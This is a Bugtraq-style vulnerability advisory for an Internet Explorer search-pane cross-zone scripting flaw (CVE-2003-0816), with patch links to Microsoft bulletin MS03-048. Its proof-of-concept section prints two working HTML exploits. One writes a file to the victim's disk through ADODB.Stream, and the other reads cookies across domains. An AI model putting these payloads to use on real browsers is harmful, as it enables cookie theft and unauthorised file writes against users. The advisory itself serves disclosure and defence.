Microsoft Internet Explorer window.open Search Pane Cross-Zone Scripting Vulnerability
BID:9798
Info
Microsoft Internet Explorer window.open Search Pane Cross-Zone Scripting Vulnerability
| Bugtraq ID: | 9798 |
| Class: | Design Error |
| CVE: |
CVE-2003-0816 |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 10 2003 12:00AM |
| Updated: | Jul 12 2009 03:06AM |
| Credit: | Discovery of this issue is credited to Liu Die Yu. |
| Vulnerable: |
Microsoft Internet Explorer 5.0.1 SP4 Microsoft Internet Explorer 5.0.1 SP3 Microsoft Internet Explorer 5.0.1 SP2 Microsoft Internet Explorer 5.0.1 SP1 Microsoft Internet Explorer 5.0.1 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 Microsoft Internet Explorer 5.5 SP2 Microsoft Internet Explorer 5.5 SP1 Microsoft Internet Explorer 5.5 Microsoft Internet Explorer 5.0 |
| Not Vulnerable: | |
Discussion
Microsoft Internet Explorer window.open Search Pane Cross-Zone Scripting Vulnerability
A vulnerability has been reported in Microsoft Internet Explorer that could enable unauthorized access by malicious scripts and Active Content to document properties across different Security Zones and foreign domains. This issue is exposed when search panes are opened via the window.open method. It is possible for malicious script code to access the properties of a foreign domain opened within the search pane.
Exploitation of this issue could allow various attacks, such as cookie-theft from an arbitrary domain. Other issues, such as additional described in BID 8577, may also facilitate execution of arbitrary code on a vulnerable client system.
It should be noted that support for the search pane was introduced in Internet Explorer 5.
This issue was originally described in BID 8577 "Multiple Microsoft Internet Explorer Script Execution Vulnerabilities".
A vulnerability has been reported in Microsoft Internet Explorer that could enable unauthorized access by malicious scripts and Active Content to document properties across different Security Zones and foreign domains. This issue is exposed when search panes are opened via the window.open method. It is possible for malicious script code to access the properties of a foreign domain opened within the search pane.
Exploitation of this issue could allow various attacks, such as cookie-theft from an arbitrary domain. Other issues, such as additional described in BID 8577, may also facilitate execution of arbitrary code on a vulnerable client system.
It should be noted that support for the search pane was introduced in Internet Explorer 5.
This issue was originally described in BID 8577 "Multiple Microsoft Internet Explorer Script Execution Vulnerabilities".
Exploit / POC
Microsoft Internet Explorer window.open Search Pane Cross-Zone Scripting Vulnerability
The following examples were provided:
---------------------------CrossZone.htm---------------------------
<script>
window.open("http://wrong_site_add/","_search") //To load "Friendly HTTP error messages" page
// cause it's in My Computer Zone.
setTimeout(function(){
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
inject_html="<img src='" + img_src + "'>";
window.open('file:javascript:document.write("' + inject_html + '")','_search');
},5000);
&lt;/script&gt;
-------------------------------End---------------------------------
---------------------------CrossSite.htm---------------------------
&lt;script&gt;
window.open("http://www.google.com/","_search")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_search")
},5000);
&lt;/script&gt;
-------------------------------End---------------------------------
Examples are also available on the following web pages:
http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm
http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm
The original proof-of-concept is available at the following location:
http://www.safecenter.net/liudieyu/WsFakeSrc/WsFakeSrc-MyPage.HTM
The following examples were provided:
---------------------------CrossZone.htm---------------------------
&lt;script&gt;
window.open("http://wrong_site_add/","_search") //To load "Friendly HTTP error messages" page
// cause it's in My Computer Zone.
setTimeout(function(){
// '\\42' -> '\42' -> ' " '
img_src='javascript:file = \\42Exploit.txt\\42; o = new ActiveXObject(\\42ADODB.Stream\\42);'
+ ' o.Open(); o.Type=2; o.Charset=\\42ascii\\42; o.WriteText(\\42My name is Cheng Peng Su.\\42);'
+ ' o.SaveToFile(file, 2); o.Close(); alert(\\42I wanna create \\42+file+\\42 on your desktop!\\42);';
inject_html="<img src='" + img_src + "'>";
window.open('file:javascript:document.write("' + inject_html + '")','_search');
},5000);
&lt;/script&gt;
-------------------------------End---------------------------------
---------------------------CrossSite.htm---------------------------
&lt;script&gt;
window.open("http://www.google.com/","_search")
setTimeout(function(){
window.open("file:javascript:alert(document.cookie);","_search")
},5000);
&lt;/script&gt;
-------------------------------End---------------------------------
Examples are also available on the following web pages:
http://www.freewebs.com/applesoup/CrossBar/CrossSiteSB.htm
http://www.freewebs.com/applesoup/CrossBar/CrossZoneSB.htm
The original proof-of-concept is available at the following location:
http://www.safecenter.net/liudieyu/WsFakeSrc/WsFakeSrc-MyPage.HTM
Solution / Fix
Microsoft Internet Explorer window.open Search Pane Cross-Zone Scripting Vulnerability
Solution:
This issue has been addressed by Microsoft Security Bulletin MS03-048.
Microsoft Internet Explorer 6.0 SP1
Microsoft Internet Explorer 5.5 SP2
Microsoft Internet Explorer 6.0
Microsoft Internet Explorer 5.0.1 SP1
Microsoft Internet Explorer 5.0.1 SP3
Microsoft Internet Explorer 5.0.1
Microsoft Internet Explorer 5.0.1 SP2
Solution:
This issue has been addressed by Microsoft Security Bulletin MS03-048.
Microsoft Internet Explorer 6.0 SP1
-
Microsoft Cumulative Security Update for Internet Explorer 6 Service Pack 1 (KB824145)
http://www.microsoft.com/downloads/details.aspx?FamilyId=9D8543E9-0E2B -46C9-B6C6-12DE03860465&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 6 SP1 64-bit Edition (KB824145)
http://www.microsoft.com/downloads/details.aspx?FamilyId=35F99CF5-3629 -4E0E-BF60-24845D2D20C9&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 (KB824145)
http://www.microsoft.com/downloads/details.aspx?FamilyId=7D0D02DD-8940 -48E0-B163-3FCDCB558F21&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer for Windows Server 2003 64-bit Edition (KB824145)
http://www.microsoft.com/downloads/details.aspx?FamilyId=8BEFA1EC-0C48 -4B65-989D-58B0CE1E6F95&displaylang=en
Microsoft Internet Explorer 5.5 SP2
-
Microsoft Cumulative Security Update for Internet Explorer 5.5 Service Pack 2 (KB824145)
http://www.microsoft.com/downloads/details.aspx?FamilyId=E438AFD4-DF70 -448C-8925-1075C8BE6C5E&displaylang=en
Microsoft Internet Explorer 6.0
-
Microsoft Cumulative Security Update for Internet Explorer 6 (KB824145)
http://www.microsoft.com/downloads/details.aspx?FamilyId=4C4D22F0-FBF7 -4EA6-9CC2-27D104D4198E&displaylang=en
Microsoft Internet Explorer 5.0.1 SP1
-
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 2 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP2
http://www.microsoft.com/downloads/details.aspx?FamilyId=221616D4-5893 -4DA4-A223-B0DE548D6D83&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 3 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP3
http://www.microsoft.com/downloads/details.aspx?FamilyId=F4853D8F-F66C -4D8A-9979-3B4F540F90A8&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 4 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP4
http://www.microsoft.com/downloads/details.aspx?FamilyId=C15E2DB3-14E2 -43A4-A1A1-676374B66517&displaylang=en
Microsoft Internet Explorer 5.0.1 SP3
-
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 2 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP2
http://www.microsoft.com/downloads/details.aspx?FamilyId=221616D4-5893 -4DA4-A223-B0DE548D6D83&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 3 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP3
http://www.microsoft.com/downloads/details.aspx?FamilyId=F4853D8F-F66C -4D8A-9979-3B4F540F90A8&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 4 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP4
http://www.microsoft.com/downloads/details.aspx?FamilyId=C15E2DB3-14E2 -43A4-A1A1-676374B66517&displaylang=en
Microsoft Internet Explorer 5.0.1
-
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 2 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP2
http://www.microsoft.com/downloads/details.aspx?FamilyId=221616D4-5893 -4DA4-A223-B0DE548D6D83&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 3 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP3
http://www.microsoft.com/downloads/details.aspx?FamilyId=F4853D8F-F66C -4D8A-9979-3B4F540F90A8&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 4 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP4
http://www.microsoft.com/downloads/details.aspx?FamilyId=C15E2DB3-14E2 -43A4-A1A1-676374B66517&displaylang=en
Microsoft Internet Explorer 5.0.1 SP2
-
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 2 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP2
http://www.microsoft.com/downloads/details.aspx?FamilyId=221616D4-5893 -4DA4-A223-B0DE548D6D83&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 3 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP3
http://www.microsoft.com/downloads/details.aspx?FamilyId=F4853D8F-F66C -4D8A-9979-3B4F540F90A8&displaylang=en -
Microsoft Cumulative Security Update for Internet Explorer 5.01 for Windows 2000 Service Pack 4 (KB824145)
For Internet Explorer 5.01 on Windows 2000 SP4
http://www.microsoft.com/downloads/details.aspx?FamilyId=C15E2DB3-14E2 -43A4-A1A1-676374B66517&displaylang=en
References
Microsoft Internet Explorer window.open Search Pane Cross-Zone Scripting Vulnerability
References:
References:
- Internet Explorer Cross Zone/Site Scripting Vulnerability (Cheng Peng Su)
- Microsoft Security Bulletin MS03-048 (Microsoft)
- MSIE->WsFakeSrc (Liu Die Yu
- RE: New Internet Explorer Cross Zone/Site Scripting Vulnerability ("Thor Larholm"